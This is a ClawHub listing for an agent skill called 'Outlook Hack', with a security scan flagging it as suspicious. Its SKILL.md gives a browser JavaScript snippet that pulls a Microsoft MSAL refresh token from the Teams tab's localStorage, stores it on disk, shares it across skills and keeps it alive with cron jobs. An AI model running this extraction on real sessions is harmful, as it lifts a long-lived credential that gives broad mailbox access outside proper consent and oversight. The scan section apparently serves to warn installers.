ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Outlook Hack

Your agent reads Outlook email all day. Drafts replies for you. Won't send a single one. Not even if you ask nicely.

MIT-0 · Free to use, modify, and redistribute. No attribution required.
0 · 407 · 0 current installs · 0 all-time installs
byOscar Serra@globalcaos
MIT-0
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Suspicious
medium confidence
Purpose & Capability
The code and instructions align with the stated purpose: reading, searching, indexing attachments, generating summaries, creating drafts and accessing calendar/contacts via Microsoft Graph. However, the chosen method for authentication (extracting an MSAL refresh token from Teams localStorage and reusing it across skills) is unusual and elevates risk even though it is coherent with the goal of using Graph APIs without formal OAuth consent flows.
!
Instruction Scope
SKILL.md explicitly instructs you to run browser JS in the Teams tab to read localStorage and extract an MSAL refresh token, and to use a separate 'teams' CLI to store it. The runtime instructions therefore direct the agent/user to access browser session storage and persist a powerful credential locally. The instructions also recommend cron jobs to keep the refresh token alive. These steps are beyond ordinary usage instructions and expose sensitive session tokens; they expand scope to browser session access and persistent credential management.
Install Mechanism
There is no network-based install step and no external downloads; code is bundled with the skill and runs as pure Node.js scripts (v18+). That reduces supply-chain risk. The skill is 'instruction-only' in terms of install spec, but it does include local scripts that will be written to disk when installed/run.
!
Credentials
No environment variables are requested, which is consistent, but the skill depends on a refresh token extracted from browser localStorage. That refresh token grants broad Graph access and is long‑lived (the SKILL.md claims ~90 days and auto-rotates), and the skill shares the same token file with another skill ('teams-hack'). Tokens are stored under ~/.openclaw/credentials/outlook-msal.json (0600), which is better than world-readable but still a single point of sensitive credential persistence and cross-skill privilege escalation. The need for a refresh token is understandable for Graph access, but the extraction method and cross-skill reuse are disproportionate and increase blast radius.
Persistence & Privilege
The skill does not set always:true and does not request elevated system privileges. However it persists a powerful credential to disk and the documentation recommends running periodic jobs that keep the refresh token alive — this encourages persistent, autonomous access. Also the token file is shared with other skills, which increases the long-term privilege this skill (and others) can exercise.
What to consider before installing
Before installing: understand that this skill asks you to extract a MSAL refresh token from your Teams browser session (via a browser snippet) and stores that token on disk for up to 90 days. That token can be used to read pretty much everything in the account (mail, attachments, calendar, contacts) and is shared with other skills. If you proceed, consider: (1) only run this on a low-risk/test account, not a high-value corporate account; (2) inspect the bundled scripts yourself (they are included) to confirm send operations are actually blocked and no other exfil endpoints exist; (3) prefer an OAuth app with proper consent rather than extracting localStorage tokens where possible; (4) restrict filesystem permissions and remove the token file when finished (delete ~/.openclaw/credentials/outlook-msal.json); (5) rotate/revoke the refresh token in your Microsoft account if you stop using the skill; (6) avoid giving the browser relay access to privileged sessions unless you trust the environment. If you are not comfortable with extracting and storing refresh tokens, do not install.

Like a lobster shell, security has layers — review code before you run it.

Current versionv1.0.1
Download zip
latestvk974y7pyqq6jg29xjs9p8hz8g182h7yw

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

Runtime requirements

📧 Clawdis
OSLinux · macOS

SKILL.md

Outlook Hack

Your AI agent won't email the CEO at 3am.

Not because there's a setting. Not because there's a policy. Because the code physically cannot send emails. We removed that capability the way you'd remove a chainsaw from a toddler — completely and without negotiation.

What It Does

  • 📧 Read, search, and bulk-fetch emails across all folders
  • 📎 Index all attachments (name, type, size) per message
  • 📊 Generate digest summaries with top senders, unread counts, full body text
  • ✏️ Create email drafts (lands in Drafts folder — never sends)
  • 📅 Access calendar events, 👥 Browse contacts

Quick Start

1. Token Extraction (one-time, ~30 seconds)

Extract from the Teams tab, NOT Outlook. Classic Outlook no longer exists in most orgs, and new Outlook uses PoP tokens that can't be extracted. The Teams tab provides an MSAL refresh token (90-day, auto-rotating) that powers both this skill and the teams-hack skill.

Open Microsoft Teams (teams.cloud.microsoft) in Chrome with the OpenClaw browser relay attached. Then run this in-browser evaluation:

(() => {
  const keys = Object.keys(localStorage).filter(
    (k) => k.includes("refreshtoken") || k.includes("RefreshToken"),
  );
  const parsed = JSON.parse(localStorage.getItem(keys[0]));
  const accountKeys = Object.keys(localStorage).filter((k) => {
    try {
      return JSON.parse(localStorage.getItem(k)).tenantId;
    } catch {
      return false;
    }
  });
  let tenantId = null;
  for (const k of accountKeys) {
    try {
      tenantId = JSON.parse(localStorage.getItem(k)).tenantId;
      break;
    } catch {}
  }
  return { secret: parsed.secret, tenantId };
})();

Save the token via the teams CLI (NOT the outlook-mail-fetch script):

teams token store --refresh-token "<secret>" --tenant-id "<tenantId>"

2. Verify Access

node {baseDir}/scripts/outlook-mail-fetch.mjs --test

3. Bulk Fetch

# Last 6 months (default)
node {baseDir}/scripts/outlook-mail-fetch.mjs --fetch-all

# Custom range
node {baseDir}/scripts/outlook-mail-fetch.mjs --fetch-all --months 12

Output: ~/.openclaw/workspace/data/outlook-emails/

  • raw-emails.jsonl — full email data (subject, from, to, body text, preview)
  • attachments-index.jsonl — every attachment per message
  • email-summary.md — readable digest with stats and per-email summaries

Critical: Teams is the Token Source

SourceToken TypeExtractable?Lifetime
Teams (teams.cloud.microsoft)MSAL refresh token✅ Yes90 days, auto-rotates
New Outlook (outlook.cloud.microsoft)PoP token (Proof-of-Possession)❌ NoCrypto-bound to browser
Classic Outlook (outlook.office.com)Bearer access token⚠️ Deprecated/goneMost orgs migrated

Always extract from the Teams tab. New Outlook uses Proof-of-Possession tokens that cannot be extracted or replayed. Classic Outlook is deprecated and no longer available in most orgs.

How It Works (Technical)

  1. Share your Microsoft Teams tab with OpenClaw via the Browser Relay
  2. The agent reads localStorage to extract the MSAL refresh token
  3. Token is stored and exchanged for a Graph API access token via teams token store
  4. Both this skill and teams-hack share ~/.openclaw/credentials/outlook-msal.json (0600)
  5. The outlook-mail-fetch.mjs script uses the Graph API access token for mail operations
  6. Refresh token lasts 90 days and auto-rotates on each use

The skill is NOT scraping the page. It speaks Outlook's own REST API, authenticated through your existing browser session.

Token Lifetime & Refresh

  • Refresh token: 90 days, auto-rotates on each use (shared with teams-hack)
  • Access token: ~1 hour, automatically refreshed by the scripts
  • Any cron job using either skill keeps the refresh token alive
  • When expired: re-extract from Teams tab (one browser relay session)

Architecture Notes

  • Zero external dependencies — pure Node.js (v18+), no npm packages
  • Send-blocked — the script has no send/reply/forward functions. They don't exist.
  • Rate-limited — fetches 50 emails per page with automatic pagination
  • Body text cleaned — HTML stripped, whitespace normalized, truncated to 3000 chars per email

The Full Stack

Pair with whatsapp-ultimate for messaging and jarvis-voice for voice.

👉 Clone it. Fork it. Break it. Make it yours.

Files

3 total
Select a file
Select a file to preview.

Comments

Loading comments…